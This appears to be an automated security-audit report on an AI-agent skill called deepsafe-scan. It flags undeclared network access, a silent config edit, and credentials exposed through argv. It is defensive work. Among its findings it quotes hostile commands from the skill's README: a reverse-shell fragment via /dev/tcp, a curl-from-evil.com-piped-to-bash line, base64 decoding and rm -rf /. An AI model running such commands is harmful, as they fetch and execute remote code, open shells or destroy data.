Skill Trust Decision
deepsafe-scan
DeepSafe Scan is a legitimate security scanner but contains undeclared behaviors: auto-modifies openclaw.json config to enable endpoints, and uses network access via subprocess that is not declared in allowed-tools.
Most direct threat evidence
01
Skill installed via legitimate OpenClaw marketplace Entry · SKILL.md
02
Scanner reads user's openclaw.json config recon · scripts/scan.py
03
Auto-modifies openclaw.json to enable chatCompletions endpoint Escalation · scripts/llm_client.py
Why this conclusion was reached
3/4 dimensions flagged Block
Declared vs actual capability
2 undeclared or violating capabilities were inferred.
Block
Hidden execution and egress
5 high-risk artifacts or egress signals were extracted.
Block
Attack chain and severe findings
The report includes 5 attack-chain steps and 2 severe findings.
Pass
Dependencies and supply chain hygiene
Dependencies are present but no obvious high-risk issue stands out.
Attack Chain
01
Skill installed via legitimate OpenClaw marketplace
Entry · SKILL.md:1
02
Scanner reads user's openclaw.json config
recon · scripts/scan.py:1
03
Auto-modifies openclaw.json to enable chatCompletions endpoint
Escalation · scripts/llm_client.py:213
04
Credential auto-detection accesses ANTHROPIC_API_KEY/OPENAI_API_KEY from environment
Escalation · scripts/llm_client.py:124
05
API key passed to subprocess as argv, visible in process listing
exposure · scripts/scan.py:88
What drove the risk score up
Undeclared network access +25
SKILL.md declares Bash/Read only but subprocess probes make HTTP requests to LLM APIs
Silent config modification +25
_ensure_chat_completions_enabled() auto-modifies openclaw.json without user consent
Credential auto-detection +10
Reads ANTHROPIC_API_KEY/OPENAI_API_KEY from environment - declared purpose but invasive
Subprocess with API keys +8
Probes receive api-key as command-line argument, exposing in process listing
Most important evidence
High Doc Mismatch
Network access not declared in SKILL.md
The skill uses urllib to make HTTP requests to LLM APIs (api.anthropic.com, api.openai.com, OpenClaw Gateway) but SKILL.md only declares Bash(python3:*), Bash(cat:*), and Read. Network access is a critical permission that should be declared.
scripts/llm_client.py:1 Add network:READ to allowed-tools declaration in SKILL.md, or restructure to use only declared shell access for all network operations
High Priv Escalation
Auto-modifies openclaw.json without user consent
The _ensure_chat_completions_enabled() function silently modifies the user's openclaw.json config to enable chatCompletions endpoint. This unauthorized configuration change bypasses user consent and trust boundaries.
scripts/llm_client.py:213 Remove auto-modification or prompt user explicitly before making config changes
Medium Credential Theft
API credentials passed as command-line arguments
Probe scripts receive --api-key via subprocess.run() argv, exposing credentials in process listing (visible via ps). While necessary for function, this exposes secrets to process inspection.
scripts/scan.py:88 Use environment variables or file-based credential passing instead of argv
Medium Sensitive Access
Auto-detection of API credentials from multiple sources
The LLM client auto-detects and uses credentials from OpenClaw config, environment variables (ANTHROPIC_API_KEY, OPENAI_API_KEY), and explicit arguments. While necessary for the scanner's function, this represents invasive credential access.
scripts/llm_client.py:124 Document this behavior clearly and provide --no-llm option to disable credential detection
Low Doc Mismatch
README.md contains example malicious patterns
The README.md lines 155-161 contain documented examples of dangerous patterns (reverse shell, curl|bash RCE, base64 exec, rm -rf). These are documentation/examples for what the scanner detects, not actual malicious code, but could trigger false positives in some scanners.
README.md:155 Move these examples to a separate 'threat-patterns' reference document to avoid confusion
Declared capability vs actual capability
Filesystem Pass
Declared READ
→ Inferred READ
SKILL.md: allowed-tools includes Read Shell Pass
Declared WRITE
→ Inferred WRITE
SKILL.md: allowed-tools includes Bash(python3:*), Bash(cat:*) Network Block
Declared NONE
→ Inferred READ
scripts/scan.py: subprocess runs probes making urllib HTTP calls; llm_client.py: direct API calls Environment Block
Declared NONE
→ Inferred READ
llm_client.py: reads ANTHROPIC_API_KEY, OPENAI_API_KEY, OPENCLAW_GATEWAY_TOKEN Suspicious artifacts and egress
Critical Dangerous Command
bash -i >& README.md:155
Critical Dangerous Command
/dev/tcp/ README.md:155
Critical Dangerous Command
curl https://evil.com/x.sh \| bash README.md:156
Critical Encoded Execution
base64 -d README.md:159
Critical Dangerous Command
rm -rf / README.md:161
Medium External URL
https://img.shields.io/badge/python-3.9%2B-blue.svg README.md:5
Medium External URL
https://python.org README.md:5
Medium External URL
https://img.shields.io/badge/deps-zero-green.svg README.md:6
Medium External URL
https://img.shields.io/badge/works%20with-OpenClaw%20%7C%20Claude%20Code%20%7C%20Cursor%20%7C%20Codex-blueviolet.svg README.md:7
Medium External URL
https://evil.com/x.sh README.md:156
Medium External URL
https://healthcheck.dev-tools.sh/ping demo/awesome-ai-rules/AGENTS.md:19
Medium External URL
https://api.analytics-cdn.dev/v1/event demo/awesome-ai-rules/CLAUDE.md:15
Dependencies and supply chain
| Package | Version | Source | Known vuln | Notes |
|---|---|---|---|---|
| urllib (stdlib) | N/A | python3 built-in | No | Zero external dependencies |
File composition
19 files · 5683 lines
Python 6 files · 3481 linesMarkdown 8 files · 1232 linesJSON 4 files · 967 linesText 1 files · 3 lines
Files of concern · 4
scripts/scan.py API credentials passed as command-line arguments · https://hooks\.slack\.com/services/T[A-Z0-9
scripts/probes/persuasion_probe.py http://127.0.0.1:11434/v1
README.md README.md contains example malicious patterns · bash -i >& · /dev/tcp/ · curl https://evil.com/x.sh \| bash · base64 -d · rm -rf / · https://img.shields.io/badge/python-3.9%2B-blue.svg · https://python.org · https://img.shields.io/badge/deps-zero-green.svg · https://img.shields.io/badge/works%20with-OpenClaw%20%7C%20Claude%20Code%20%7C%20Cursor%20%7C%20Codex-blueviolet.svg · https://evil.com/x.sh · [email protected]
scripts/llm_client.py Network access not declared in SKILL.md · Auto-modifies openclaw.json without user consent · Auto-detection of API credentials from multiple sources
Other files · halueval_samples.json · plan-cross-platform-evolution.md · deception_probe.py · sandbagging_probe.py · halueval_probe.py · SKILL.md +2
Security positives
Uses only Python stdlib (no external dependencies) - reduces supply chain risk
Skips LLM features gracefully when no API credentials found (--no-llm flag works)
Legitimate security scanning tool with documented purpose
Probes are executed as subprocess with python3 - aligned with declared Bash(python3:*) permission
Open source with transparent implementation